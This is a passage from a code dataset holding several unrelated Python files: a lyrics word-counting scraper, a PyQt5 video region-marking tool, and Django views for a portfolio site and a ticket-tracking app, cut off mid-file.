[AFI_INET, AFI_INET6]\n\nSAFI_UNICAST = 1\nSAFI_MULTICAST = 2\nSUPPORTED_SAFI = [SAFI_UNICAST, SAFI_MULTICAST]\n","sub_path":"pybal/bgp/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372165771","text":"import re\nimport requests\nfrom lxml import html\nfrom bs4 import BeautifulSoup\nfrom unidecode import unidecode\n\ndef print_words(words, max_words=20):\n ''' Print first max_words according to the num of occurences '''\n count_words = {k: v for k, v in sorted(words.items(), key=lambda item: item[1], reverse=True)} \n \n for i, (k, v) in enumerate(count_words.items()):\n if i > max_words: break\n print(f'{k}:\\t\\t{v}')\n\ndef make_request(url):\n ''' Make request with the request module and treat errors '''\n\n headers = {\n 'sec-ch-ua': '\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"',\n 'sec-ch-ua-mobile': '?0',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',\n }\n\n try:\n response = requests.get(url, headers=headers)\n except Exception as e:\n print(f'Error - {e.args}')\n return None\n \n if response.status_code != 200:\n return None\n\n return response\n\ndef get_songs_tags_lxml(response):\n ''' Use lxml to parse artist page '''\n tree = html.fromstring(response.text)\n songs_tags = 
tree.xpath('//a[@class=\"song-name\"]')\n return songs_tags\n\ndef get_songs_tags_bs4(response):\n ''' Use BeautifulSoup to parse artist page '''\n soup = BeautifulSoup(response.text, 'lxml')\n songs_tags = soup.find_all('a', {'class': 'song-name'}, href=True)\n return songs_tags\n\ndef get_lyrics_lxml(response):\n ''' Use lxml to parse song lyrics page '''\n tree = html.fromstring(response.text)\n lyrics = tree.xpath('//div[@class=\"cnt-letra p402_premium\"]//text()')\n return lyrics\n\ndef get_lyrics_bs4(response):\n ''' Use BeautifulSoup to parse song lyrics page '''\n soup = BeautifulSoup(response.text, 'lxml')\n lyrics_div = soup.find('div', {'class': 'cnt-letra p402_premium'})\n lyrics_tags = lyrics_div.find_all('p')\n lyrics = [t.get_text(separator=' ') for t in lyrics_tags]\n return lyrics\n\nif __name__ == '__main__':\n use_lxml = True # set which module to use\n max_songs = 10 # set amount of songs to consider\n artist = 'O grilo' # set artist\n \n main_url = 'https://www.letras.mus.br' \n clean_artist = artist.lower().replace(' ', '-')\n url = main_url + '/' + clean_artist\n\n # get artist page\n response = make_request(url)\n \n if response == None:\n print('Failed')\n exit(1)\n \n # parse artist page\n if use_lxml:\n songs_tags = get_songs_tags_lxml(response)\n else:\n songs_tags = get_songs_tags_bs4(response)\n\n songs_urls = [main_url + song.get('href') for song in songs_tags]\n \n count_words = {}\n num_songs = min(len(songs_urls), max_songs)\n \n # get each song\n for index, url in enumerate(songs_urls[:num_songs], 1):\n song_name = url.split('/')[-2]\n print(f'[{index}/{num_songs}] - {song_name}')\n \n response = make_request(url)\n if response is None:\n print(f'{url} failed')\n continue\n\n # parse lyrics page\n if use_lxml:\n lyrics = get_lyrics_lxml(response)\n else:\n lyrics = get_lyrics_bs4(response)\n \n # loop over verses and words counting them\n for verse in lyrics:\n words = verse.split(' ')\n\n for word in words:\n word = word.lower()\n word = unidecode(word)\n word = re.sub(r'\\W+', '', word)\n\n if word == '':\n continue\n\n if word in count_words:\n count_words[word] += 1\n else:\n count_words[word] = 1\n\n # show result\n print_words(count_words)\n","sub_path":"requests_letras.py","file_name":"requests_letras.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"624043882","text":"from PyQt5.QtWidgets import QWidget, QVBoxLayout, QApplication, QLabel, QPushButton, QStyle, QHBoxLayout, QListWidget, QAction, QMainWindow, QSizePolicy, QFileDialog, QInputDialog, QListWidgetItem, QGraphicsView, QGraphicsScene\nfrom PyQt5.QtCore import QDir, QUrl, QPointF, QSizeF\nfrom PyQt5.QtMultimedia import QMediaContent, QMediaPlayer\nfrom PyQt5.QtMultimediaWidgets import QVideoWidget, QGraphicsVideoItem\nimport sys\nimport ffms2\nimport numpy as np\nimport json\nimport csv\n\n\nclass CMRegionListItem(QListWidgetItem):\n def __init__(self, start, stop, well):\n QListWidgetItem.__init__(self, \"{} - {} ({})\".format(start/1000.0, stop/1000.0, well))\n self.start = start\n self.stop = stop\n self.well = well\n\n def __lt__(self, other):\n return self.start > other.start\n\n\nclass CMWidget(QMainWindow):\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.SPEED_CHANGE_FACTOR = 1.25\n self.JUMP_DIST = 1000 # ms\n self.deletedItem = None\n self.videoFileName = None\n\n self.preTrialLightOffMark = None\n self.trialStartMark = None\n self.trialStopMark = None\n 
self.probeStartMark = None\n self.probeStopMark = None\n self.postProbeLightOnMark = None\n\n self.initUI()\n self.initMediaPlayer()\n\n # self.loadVideoFromFilename(\"/home/wcroughan/glasses_data/facial_recog/outvid2.mp4\")\n # self.loadVideoFromFilename()\n self.openVideo()\n\n def initUI(self):\n self.setWindowTitle(\"Camera Marker\")\n\n self.scene = QGraphicsScene()\n # self.videoWidget = QVideoWidget()\n self.videoWidget = QGraphicsVideoItem()\n self.videoWidget.setOffset(QPointF(-1200, -800))\n self.videoWidget.setSize(QSizeF(4000, 2000))\n self.scene.addItem(self.videoWidget)\n # self.scene.setSceneRect(0, 0, 1400, 1400)\n\n self.videoParent = QGraphicsView(self.scene)\n\n menuBar = self.menuBar()\n fileMenu = menuBar.addMenu(\"File\")\n ac = QAction('&Export Regions', self)\n ac.setShortcut('Shift+E')\n ac.triggered.connect(self.exportRegions)\n fileMenu.addAction(ac)\n ac = QAction('&Import Regions', self)\n ac.triggered.connect(self.importRegions)\n fileMenu.addAction(ac)\n ac = QAction('&Open Video', self)\n ac.setShortcut('Ctrl+O')\n ac.triggered.connect(self.openVideo)\n fileMenu.addAction(ac)\n ac = QAction('Exit', self)\n ac.triggered.connect(self.exitCall)\n fileMenu.addAction(ac)\n\n mediaMenu = menuBar.addMenu(\"Media\")\n\n self.playButton = QPushButton()\n self.playButton.setEnabled(False)\n self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.playButton.clicked.connect(self.play)\n ac = QAction('&Play', self)\n ac.setShortcut('5')\n ac.triggered.connect(self.play)\n mediaMenu.addAction(ac)\n\n self.speedUpButton = QPushButton(\"speed up\")\n self.speedUpButton.setEnabled(False)\n self.speedUpButton.clicked.connect(self.speedUp)\n ac = QAction('Speed &Up', self)\n ac.setShortcut('+')\n ac.triggered.connect(self.speedUp)\n mediaMenu.addAction(ac)\n\n self.slowDownButton = QPushButton(\"slow down\")\n self.slowDownButton.setEnabled(False)\n self.slowDownButton.clicked.connect(self.slowDown)\n ac = QAction('Slow &Down', self)\n ac.setShortcut('-')\n ac.triggered.connect(self.slowDown)\n mediaMenu.addAction(ac)\n\n self.jumpFwdButton = QPushButton(\"jump fwd\")\n self.jumpFwdButton.setEnabled(False)\n self.jumpFwdButton.clicked.connect(self.jumpFwd)\n ac = QAction('Jump Fwd', self)\n ac.setShortcut('3')\n ac.triggered.connect(self.jumpFwd)\n mediaMenu.addAction(ac)\n\n self.jumpBackButton = QPushButton(\"jump back\")\n self.jumpBackButton.setEnabled(False)\n self.jumpBackButton.clicked.connect(self.jumpBack)\n ac = QAction('Jump Back', self)\n ac.setShortcut('1')\n ac.triggered.connect(self.jumpBack)\n mediaMenu.addAction(ac)\n\n self.fwdFrameButton = QPushButton(\"fwd frame\")\n self.fwdFrameButton.setEnabled(False)\n self.fwdFrameButton.clicked.connect(self.fwdFrame)\n ac = QAction('fwd Frame', self)\n ac.setShortcut('6')\n ac.triggered.connect(self.fwdFrame)\n mediaMenu.addAction(ac)\n\n self.backFrameButton = QPushButton(\"back frame\")\n self.backFrameButton.setEnabled(False)\n self.backFrameButton.clicked.connect(self.backFrame)\n ac = QAction('back Frame', self)\n ac.setShortcut('4')\n ac.triggered.connect(self.backFrame)\n mediaMenu.addAction(ac)\n\n regionsMenu = menuBar.addMenu(\"Regions\")\n self.setStartMarkButton = QPushButton(\"set start\")\n self.setStartMarkButton.setEnabled(False)\n self.setStartMarkButton.clicked.connect(self.setStartMark)\n ac = QAction('Set Start Mark', self)\n ac.setShortcut('7')\n ac.triggered.connect(self.setStartMark)\n regionsMenu.addAction(ac)\n\n self.setStopMarkButton = QPushButton(\"set stop\")\n 
self.setStopMarkButton.setEnabled(False)\n self.setStopMarkButton.clicked.connect(self.setStopMark)\n ac = QAction('Set Stop Mark', self)\n ac.setShortcut('9')\n ac.triggered.connect(self.setStopMark)\n regionsMenu.addAction(ac)\n\n self.jumpToStartMarkButton = QPushButton(\"->start\")\n self.jumpToStartMarkButton.setEnabled(False)\n self.jumpToStartMarkButton.clicked.connect(self.jumpToStartMark)\n ac = QAction('Jump to Start Mark', self)\n ac.setShortcut('/')\n ac.triggered.connect(self.jumpToStartMark)\n regionsMenu.addAction(ac)\n\n self.jumpToStopMarkButton = QPushButton(\"->stop\")\n self.jumpToStopMarkButton.setEnabled(False)\n self.jumpToStopMarkButton.clicked.connect(self.jumpToStopMark)\n ac = QAction('Jump to Stop Mark', self)\n ac.setShortcut('*')\n ac.triggered.connect(self.jumpToStopMark)\n regionsMenu.addAction(ac)\n\n controlLayout = QHBoxLayout()\n controlLayout.addWidget(self.playButton)\n controlLayout.addWidget(self.speedUpButton)\n controlLayout.addWidget(self.slowDownButton)\n controlLayout.addWidget(self.jumpFwdButton)\n controlLayout.addWidget(self.jumpBackButton)\n controlLayout.addWidget(self.setStartMarkButton)\n controlLayout.addWidget(self.setStopMarkButton)\n controlLayout.addWidget(self.jumpToStartMarkButton)\n controlLayout.addWidget(self.jumpToStopMarkButton)\n controlLayout.addWidget(self.fwdFrameButton)\n controlLayout.addWidget(self.backFrameButton)\n\n self.saveRegionButton = QPushButton(\"save\")\n # self.saveRegionButton.setEnabled(False)\n self.saveRegionButton.clicked.connect(self.saveRegion)\n ac = QAction('Save Region', self)\n ac.setShortcut('8')\n ac.triggered.connect(self.saveRegion)\n regionsMenu.addAction(ac)\n\n self.loadRegionButton = QPushButton(\"load\")\n # self.loadRegionButton.setEnabled(False)\n self.loadRegionButton.clicked.connect(self.loadRegion)\n ac = QAction('Load Region', self)\n ac.triggered.connect(self.loadRegion)\n regionsMenu.addAction(ac)\n\n self.deleteRegionButton = QPushButton(\"delete\")\n # self.deleteRegionButton.setEnabled(False)\n self.deleteRegionButton.clicked.connect(self.deleteRegion)\n ac = QAction('Delete Region', self)\n ac.triggered.connect(self.deleteRegion)\n regionsMenu.addAction(ac)\n\n self.restoreRegionButton = QPushButton(\"restore\")\n # self.restoreRegionButton.setEnabled(False)\n self.restoreRegionButton.clicked.connect(self.restoreRegion)\n ac = QAction('Restore Region', self)\n ac.triggered.connect(self.restoreRegion)\n regionsMenu.addAction(ac)\n\n self.regionListWidget = QListWidget()\n self.regionListWidget.setSortingEnabled(True)\n\n regionListButtonsLayout = QVBoxLayout()\n regionListButtonsLayout.addWidget(self.saveRegionButton)\n regionListButtonsLayout.addWidget(self.loadRegionButton)\n regionListButtonsLayout.addWidget(self.deleteRegionButton)\n regionListButtonsLayout.addWidget(self.restoreRegionButton)\n\n regionListLayout = QHBoxLayout()\n regionListLayout.addWidget(self.regionListWidget)\n regionListLayout.addLayout(regionListButtonsLayout)\n\n self.setMetaLabelMarkButton = QPushButton(\"Set Meta Label\")\n self.setMetaLabelMarkButton.clicked.connect(self.setMetaLabelMark)\n ac = QAction('Set Meta Label Mark', self)\n ac.setShortcut('2')\n ac.triggered.connect(self.setMetaLabelMark)\n regionsMenu.addAction(ac)\n\n self.preTrialLightOffMarkLabel = QLabel(str(self.preTrialLightOffMark))\n self.trialStartMarkLabel = QLabel(str(self.trialStartMark))\n self.trialStopMarkLabel = QLabel(str(self.trialStopMark))\n self.probeStartMarkLabel = QLabel(str(self.probeStartMark))\n 
self.probeStopMarkLabel = QLabel(str(self.probeStopMark))\n self.postProbeLightOnMarkLabel = QLabel(str(self.postProbeLightOnMark))\n\n metaLabelsLayout = QHBoxLayout()\n metaLabelsLayout.addWidget(QLabel(\"Pretrial light off:\"))\n metaLabelsLayout.addWidget(self.preTrialLightOffMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Trial start\"))\n metaLabelsLayout.addWidget(self.trialStartMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Trial stop\"))\n metaLabelsLayout.addWidget(self.trialStopMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Probe start\"))\n metaLabelsLayout.addWidget(self.probeStartMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Probe stop\"))\n metaLabelsLayout.addWidget(self.probeStopMarkLabel)\n metaLabelsLayout.addWidget(QLabel(\"Postprobe light on:\"))\n metaLabelsLayout.addWidget(self.postProbeLightOnMarkLabel)\n metaLabelsLayout.addWidget(self.setMetaLabelMarkButton)\n\n self.statusLabel = QLabel(\"yo\")\n self.statusLabel.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Maximum)\n\n layout = QVBoxLayout()\n layout.addWidget(self.videoParent)\n layout.addLayout(controlLayout)\n layout.addLayout(regionListLayout)\n layout.addLayout(metaLabelsLayout)\n layout.addWidget(self.statusLabel)\n\n wid = QWidget(self)\n wid.setLayout(layout)\n self.setCentralWidget(wid)\n\n def initMediaPlayer(self):\n self.mediaPlayer = QMediaPlayer(None, QMediaPlayer.VideoSurface)\n self.mediaPlayer.setVideoOutput(self.videoWidget)\n\n self.mediaPlayer.stateChanged.connect(self.mediaStateChanged)\n self.mediaPlayer.positionChanged.connect(self.mediaPositionChanged)\n self.mediaPlayer.durationChanged.connect(self.mediaDurationChanged)\n self.mediaPlayer.error.connect(self.handleMediaError)\n\n def openVideo(self):\n fileName, _ = QFileDialog.getOpenFileName(self, \"Open Video\", QDir.homePath())\n\n if fileName != '':\n self.loadVideoFromFilename(fileName)\n\n def loadVideoFromFilename(self, fileName):\n self.mediaPlayer.setMedia(QMediaContent(QUrl.fromLocalFile(fileName)))\n self.playButton.setEnabled(True)\n self.speedUpButton.setEnabled(True)\n self.slowDownButton.setEnabled(True)\n self.jumpFwdButton.setEnabled(True)\n self.jumpBackButton.setEnabled(True)\n self.setStartMarkButton.setEnabled(True)\n self.setStopMarkButton.setEnabled(True)\n self.fwdFrameButton.setEnabled(True)\n self.backFrameButton.setEnabled(True)\n\n self.startMark = None\n self.stopMark = None\n\n ffmsvid = ffms2.VideoSource(fileName)\n # print(\"Frames:{}\".format(ffmsvid.properties.NumFrames))\n # print(\"Times:{}\".format(ffmsvid.track.timecodes))\n self.frameTimes = np.array(ffmsvid.track.timecodes)\n\n self.videoFileName = fileName\n\n def exitCall(self):\n sys.exit(0)\n\n def play(self):\n if self.mediaPlayer.state() == QMediaPlayer.PlayingState:\n self.mediaPlayer.pause()\n else:\n self.mediaPlayer.play()\n\n def speedUp(self):\n self.mediaPlayer.setPlaybackRate(self.mediaPlayer.playbackRate() * 1.25)\n self.statusLabel.setText(\"New playback rate: {}\".format(self.mediaPlayer.playbackRate()))\n\n def slowDown(self):\n self.mediaPlayer.setPlaybackRate(self.mediaPlayer.playbackRate() / self.SPEED_CHANGE_FACTOR)\n self.statusLabel.setText(\"New playback rate: {}\".format(self.mediaPlayer.playbackRate()))\n\n def jumpFwd(self):\n self.mediaPlayer.setPosition(self.mediaPlayer.position() + self.JUMP_DIST)\n self.statusLabel.setText(\"Jumped by {} ms. 
New position: {}\".format(\n self.JUMP_DIST, self.mediaPlayer.position()))\n\n def jumpBack(self):\n self.mediaPlayer.setPosition(self.mediaPlayer.position() - self.JUMP_DIST)\n self.statusLabel.setText(\"Jumped by {} ms. New position: {}\".format(\n -self.JUMP_DIST, self.mediaPlayer.position()))\n\n def setStartMark(self):\n self.startMark = self.mediaPlayer.position()\n self.statusLabel.setText(\"Start Mark set to {}\".format(self.startMark))\n\n def setStopMark(self):\n self.stopMark = self.mediaPlayer.position()\n self.statusLabel.setText(\"Stop Mark set to {}\".format(self.stopMark))\n\n def setMetaLabelMark(self):\n option, ok = QInputDialog.getInt(\n self, \"Which mark are you making\", \"1 - pretrial light on\\n2 - trial start\\n3 - trial end\\n4 - probe start\\n5 - probe end\\n6 - post probe light on\")\n if ok:\n if option == 1:\n self.preTrialLightOffMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"pre trial light off mark set to {}\".format(self.preTrialLightOffMark))\n self.preTrialLightOffMarkLabel.setText(str(self.preTrialLightOffMark))\n elif option == 2:\n self.trialStartMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"trial start mark set to {}\".format(self.trialStartMark))\n self.trialStartMarkLabel.setText(str(self.trialStartMark))\n elif option == 3:\n self.trialStopMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"trial Stop mark set to {}\".format(self.trialStopMark))\n self.trialStopMarkLabel.setText(str(self.trialStopMark))\n elif option == 4:\n self.probeStartMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"probe start mark set to {}\".format(self.probeStartMark))\n self.probeStartMarkLabel.setText(str(self.probeStartMark))\n elif option == 5:\n self.probeStopMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"probe Stop mark set to {}\".format(self.probeStopMark))\n self.probeStopMarkLabel.setText(str(self.probeStopMark))\n elif option == 6:\n self.postProbeLightOnMark = self.mediaPlayer.position()\n self.statusLabel.setText(\n \"probe Stop mark set to {}\".format(self.postProbeLightOnMark))\n self.postProbeLightOnMarkLabel.setText(str(self.postProbeLightOnMark))\n\n def jumpToStartMark(self):\n if self.startMark is not None:\n self.statusLabel.setText(\"Jumping to start mark at {}\".format(self.startMark))\n self.mediaPlayer.setPosition(self.startMark)\n else:\n self.statusLabel.setText(\"no start mark to jump to\")\n\n def jumpToStopMark(self):\n if self.stopMark is not None:\n self.statusLabel.setText(\"Jumping to stop mark at {}\".format(self.stopMark))\n self.mediaPlayer.setPosition(self.stopMark)\n else:\n self.statusLabel.setText(\"no stop mark to jump to\")\n\n def fwdFrame(self):\n currentFrame = np.searchsorted(self.frameTimes, self.mediaPlayer.position())\n if currentFrame < len(self.frameTimes):\n self.mediaPlayer.setPosition(int(self.frameTimes[currentFrame+1]))\n self.statusLabel.setText(\"Going fwd one frame\")\n else:\n self.statusLabel.setText(\"Can't go fwd a frame, already at end\")\n\n def backFrame(self):\n currentFrame = np.searchsorted(self.frameTimes, self.mediaPlayer.position())\n if currentFrame > 0:\n self.mediaPlayer.setPosition(int(self.frameTimes[currentFrame-1]))\n self.statusLabel.setText(\"Going back one frame\")\n else:\n self.statusLabel.setText(\"Can't go back a frame, already at start\")\n\n def saveRegion(self):\n well, ok = QInputDialog.getInt(self, \"Well\", \"well\")\n if ok:\n reg = dict()\n reg['start'] = self.startMark\n reg['stop'] = 
self.stopMark\n reg['well'] = well\n # self.regionListWidget.addItem(json.dumps(reg))\n self.regionListWidget.addItem(CMRegionListItem(self.startMark, self.stopMark, well))\n\n def loadRegion(self):\n listItem = self.regionListWidget.currentItem()\n self.startMark = listItem.start\n self.stopMark = listItem.stop\n # d = json.loads(listItem.text())\n # self.startMark = d['start']\n # self.stopMark = d['stop']\n self.statusLabel.setText(\"Loaded item {}\".format(listItem))\n\n def deleteRegion(self):\n self.deletedItem = self.regionListWidget.takeItem(self.regionListWidget.currentRow())\n self.statusLabel.setText(\"Deleted {}\".format(self.deletedItem))\n\n def restoreRegion(self):\n if self.deletedItem is None:\n self.statusLabel.setText(\"No item to restore\")\n else:\n self.regionListWidget.addItem(self.deletedItem)\n self.statusLabel.setText(\"Restored item {}\".format(self.deletedItem))\n\n def mediaStateChanged(self, state):\n # print(\"mediaStateChanged {}\".format(state))\n pass\n\n def mediaPositionChanged(self, position):\n # print(\"mediaPositionChanged {}\".format(position))\n pass\n\n def mediaDurationChanged(self, dur):\n # print(\"mediaDurationChanged {}\".format(dur))\n pass\n\n def handleMediaError(self, er):\n print(\"handleMediaError {}\".format(er))\n\n def exportRegions(self):\n fnfilt = \"rgs(*.rgs)\"\n defaultFileName = self.videoFileName + \".rgs\"\n fileName, _ = QFileDialog.getSaveFileName(self, \"Save Regions\", defaultFileName, fnfilt)\n\n if fileName != '':\n if not fileName.endswith(\".rgs\"):\n fileName += \".rgs\"\n self.saveRegionsFromFilename(fileName)\n\n def saveRegionsFromFilename(self, fileName):\n it = [self.regionListWidget.item(r) for r in range(self.regionListWidget.count())]\n with open(fileName, 'w') as csvfile:\n w = csv.writer(csvfile)\n w.writerow([self.preTrialLightOffMark, self.trialStartMark, self.trialStopMark])\n w.writerow([self.probeStartMark, self.probeStopMark, self.postProbeLightOnMark])\n for i in it:\n w.writerow([i.start, i.stop, i.well])\n\n def importRegions(self):\n fnfilt = \"rgs(*.rgs)\"\n if self.videoFileName is not None:\n defaultFileName = self.videoFileName + \".rgs\"\n else:\n defaultFileName = QDir.homePath()\n fileName, _ = QFileDialog.getOpenFileName(self, \"Open Regions\", defaultFileName, fnfilt)\n\n if fileName != '':\n self.loadRegionsFromFilename(fileName)\n\n def loadRegionsFromFilename(self, fileName):\n with open(fileName, 'r') as csvfile:\n reader = csv.reader(csvfile)\n r = list(reader)\n\n self.regionListWidget.clear()\n\n self.preTrialLightOffMark = r[0][0]\n self.trialStartMark = r[0][1]\n self.trialStopMark = r[0][2]\n self.probeStartMark = r[1][0]\n self.probeStopMark = r[1][1]\n self.postProbeLightOnMark = r[1][2]\n self.preTrialLightOffMarkLabel.setText(str(self.preTrialLightOffMark))\n self.trialStartMarkLabel.setText(str(self.trialStartMark))\n self.trialStopMarkLabel.setText(str(self.trialStopMark))\n self.probeStartMarkLabel.setText(str(self.probeStartMark))\n self.probeStopMarkLabel.setText(str(self.probeStopMark))\n self.postProbeLightOnMarkLabel.setText(str(self.postProbeLightOnMark))\n\n for i in r[2:]:\n self.regionListWidget.addItem(CMRegionListItem(int(i[0]), int(i[1]), int(i[2])))\n\n\ndef main():\n parent_app = QApplication(sys.argv)\n cmw = CMWidget()\n cmw.resize(600, 600)\n cmw.show()\n sys.exit(parent_app.exec_())\n\n\nif __name__ == \"__main__\":\n 
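# entry point: build the QApplication, show the marker window, and run the Qt event loop\n    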
main()\n","sub_path":"CameraMarker.py","file_name":"CameraMarker.py","file_ext":"py","file_size_in_byte":21122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"282004343","text":"from django.shortcuts import render, HttpResponse, HttpResponseRedirect\nfrom django.template import loader\nimport json\nfrom content import query\nfrom content.models import *\nfrom django.template.context_processors import request\nfrom django.db.models import CharField, Value, SlugField\nfrom django.db.models.functions import Concat\nfrom django.template.defaultfilters import slugify\nfrom django.core.mail import send_mail\nfrom content.forms import Contact\n\n\ndef navcontent():\n return [{'name': e[1], 'slug': e[1].lower(), 'icon': PAGE_CHOICES_ICON_REF[e[0].value]} for e in PAGE_CHOICES]\n\ndef home(request):\n profilehome_field = Profile.objects.all()\n carouselhome_field = Carousel.objects.filter(page_field=PageKey.HOME.value)\n marketinghome_field = Marketing.objects.filter(page_field=PageKey.HOME.value)\n featurettehome_field = Featurette.objects.filter(page_field=PageKey.HOME.value)\n coverhome_field = Cover.objects.filter(page_field=PageKey.HOME.value)\n \n context = {\n 'profile': profilehome_field,\n 'navcontent': navcontent(),\n 'carousel': carouselhome_field,\n 'marketing': marketinghome_field,\n 'featurette': featurettehome_field,\n 'cover': coverhome_field\n }\n return render(request, 'home.html', { 'context': context })\n\ndef work(request):\n profilework_field = Profile.objects.all()\n carouselwork_field = Carousel.objects.filter(page_field=PageKey.WORK.value)\n jumbotronwork_field = Jumbotron.objects.filter(page_field=PageKey.WORK.value)\n featurettework_field = Featurette.objects.filter(page_field=PageKey.WORK.value)\n cardwork_field = Card.objects.filter(page_field=PageKey.WORK.value)\n coverwork_field = Cover.objects.filter(page_field=PageKey.WORK.value)\n \n context = {\n 'profile': profilework_field,\n 'navcontent': navcontent(),\n 'carousel': carouselwork_field,\n 'jumbotron': jumbotronwork_field,\n 'featurette': featurettework_field,\n 'card': cardwork_field,\n 'cover': coverwork_field\n }\n return render(request, 'work.html', { 'context': context })\n\ndef about(request):\n profileabout_field = Profile.objects.all()\n carouselabout_field = Carousel.objects.filter(page_field=PageKey.ABOUT.value)\n jumbotronabout_field = Jumbotron.objects.filter(page_field=PageKey.ABOUT.value)\n featuretteabout_field = Featurette.objects.filter(page_field=PageKey.ABOUT.value)\n coverabout_field = Cover.objects.filter(page_field=PageKey.ABOUT.value)\n \n context = {\n 'profile': profileabout_field,\n 'navcontent': navcontent(),\n 'carousel': carouselabout_field,\n 'jumbotron': jumbotronabout_field,\n 'featurette': featuretteabout_field,\n 'cover': coverabout_field\n }\n return render(request, 'about.html', { 'context': context }) \n\n\ndef contact(request):\n jumbotroncontact_field = Jumbotron.objects.filter(page_field=PageKey.CONTACT.value)\n form_class = Contact\n if request.method == 'POST':\n form = form_class(data=request.POST)\n if form.is_valid():\n subject = form.cleaned_data['subject']\n message = form.cleaned_data['message']\n sender = form.cleaned_data['sender']\n cc_myself = form.cleaned_data['cc_myself']\n \n recipients = ['babakoskoui@gmail.com']\n if cc_myself:\n recipients.append(sender)\n \n send_mail(subject, message, sender, recipients)\n return HttpResponseRedirect('/thanks/')\n else:\n form = form_class \n \n context = { \n 
'navcontent': navcontent(),\n        'form': form,\n        'jumbotron': jumbotroncontact_field\n    }\n    return render(request, 'contact.html', { 'context': context })\n\ndef propertygrowth(request):\n    if request.method == 'POST':\n        years = dict(request.POST)\n        if len(years) > 1:\n            years['yearrange'] = list(map(int, years['yearrange'][0].split(' - ')))\n            return render(request, 'propertygrowth.html', years) \n        else:\n            return render(request, 'propertygrowth.html', { 'yearrange': [2010, 2017] }) \n    else:\n        return render(request, 'propertygrowth.html', { 'yearrange': [2010, 2017] })\n\nif __name__ == '__main__':\n    pass\n    \n","sub_path":"content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"479438784","text":"from __future__ import absolute_import, unicode_literals\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.mail import EmailMessage\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import DetailView, ListView, RedirectView, UpdateView\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .models import User\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response, render, redirect\n\nfrom django.core.mail import send_mail\nfrom construct_star.users.models import User, Proveedor\nfrom construct_star.users.formularios import FormularioProveedor, ImagenesTrabajosForm, FormularioUpdateCliente, FormularioCliente, FormularioUpdateProveedor, ImagenFormSet, FormularioClienteAplicaProveedor\nfrom django.forms.models import inlineformset_factory, modelformset_factory\nfrom concurrency.utils import ConcurrencyTestMixin\nfrom concurrency.api import disable_concurrency\n\nfrom allauth.account.views import SignupView\nfrom braces.views import LoginRequiredMixin\nfrom django.views.generic import CreateView, FormView, ListView\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.auth.mixins import UserPassesTestMixin, AccessMixin\nfrom django.shortcuts import redirect\n\nfrom construct_star.tickets.formularios import FormularioSeguimiento,FormularioActualziarTicket\nfrom construct_star.tickets.models import TicketBase, TicketAsignarProveedores,TicketAsignacion, Seguimiento, TicketTipo,TicketAltaTrabajo\n\nfrom construct_star.trabajos.models import TipoTrabajo,get_tarea_base,TareaElectrico,TareaPlomeria,TipoPresupuestoPrevio,TipoSinPresupuestoPrevio\nfrom construct_star.trabajos.views import borrar_tickets_asociados_a_trabajo\nfrom django.utils import timezone\n\n# imports for search\nimport operator\nfrom django.db.models import Q\nfrom functools import reduce\n\nclass TicketsListado(LoginRequiredMixin, ListView):\n    model = TicketBase\n    template_name = 'tickets/tickets_main.html'\n    view_name = 'main'\n    success_url = None\n\n    def get_context_data(self, **kwargs):\n        ret = super(TicketsListado, self).get_context_data(**kwargs)\n        usuario = User.objects.get(username=self.request.user.username)\n\n        # string search: AND-reduce one Q per word for each field, then OR the fields\n        # (asignado_a is a FK to User, so match against its username)\n        query = self.request.GET.get('q')\n        if query:\n            query_list = query.split()\n            result = TicketBase.objects.filter(\n                reduce(operator.and_,\n                       (Q(asignado_a__username__icontains=q) for q in query_list)) |\n                reduce(operator.and_,\n                       (Q(depende_en__icontains=q) for q in query_list))\n            )\n            # NOTE: computed here but not yet surfaced in the template context\n\n        if usuario is not None:\n            try:\n                tickets = TicketBase.objects.filter(iniciado_por_id=usuario.id).exclude(status=3).values()\n                ret['tickets'] = tickets\n            except Exception:\n                ret['tickets'] = None\n            try:\n                tickets = TicketBase.objects.filter(asignado_a_id=usuario.id).exclude(status=3).values()\n                ret['tickets_x_usuario'] = tickets\n            except Exception:\n                ret['tickets_x_usuario'] = None\n\n            try:\n                tickets = TicketBase.objects.all().exclude(status=3).values()\n                ret['tickets_todos'] = tickets\n            except Exception:\n                ret['tickets_todos'] = None\n\n        return ret\n\n    def get_queryset(self):\n\n        import operator\n\n        from django.db.models import Q\n        # import reduce (a Python 2 builtin) to make the search faster on Django 1.6+\n        from functools import reduce\n        result = super(TicketsListado, self).get_queryset()\n        print(str(result))\n        query = self.request.GET.get('q')\n        print(\"query es: \" + str(query))\n        if query:\n            query_list = query.split()\n\n            \"\"\"\n            result = result.filter(\n                reduce(operator.and_,\n                       (Q(asignado_a__icontains=q) for q in query_list)) |\n                reduce(operator.and_,\n                       (Q(depende_en__icontains=q) for q in query_list))\n            